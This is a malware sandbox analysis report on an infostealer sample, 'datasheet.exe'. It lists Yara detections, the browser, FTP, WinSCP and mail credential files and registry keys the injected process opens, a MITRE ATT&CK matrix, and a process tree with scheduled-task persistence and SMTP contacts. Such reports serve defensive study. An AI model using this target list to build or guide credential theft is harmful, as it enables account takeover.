                    Source: C:\Users\user\Desktop\datasheet.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\datasheet.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\datasheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match | File source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR
                    MITRE ATT&CK Matrix

                    Techniques are listed per tactic column in the order the report's matrix shows them; the leading digits are the report's signature-count badges for that cell.

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 311 Process Injection
                    Credential Access: 2 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 21 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                    Behavior Graph

                    Behavior Graph ID: 1559979 | Sample: datasheet.exe | Start date: 21/11/2024 | Architecture: WINDOWS | Score: 100
                    DNS/IP nodes: smtp.yandex.ru; smtp.yandex.com; api.ipify.org
                    Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 9 other signatures

                    Process tree (each entry is a started process; dropped files, network contacts and signatures are attached to the process the graph links them to):

                    datasheet.exe
                        dropped: C:\Users\user\AppData\...hzaIxEFbjyd.exe (PE32); C:\Users\...hzaIxEFbjyd.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp8D3A.tmp (XML); C:\Users\user\AppData\...\datasheet.exe.log (ASCII)
                        signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                        EhzaIxEFbjyd.exe
                            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
                            RegSvcs.exe
                                signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
                            schtasks.exe
                                conhost.exe
                            RegSvcs.exe
                        RegSvcs.exe
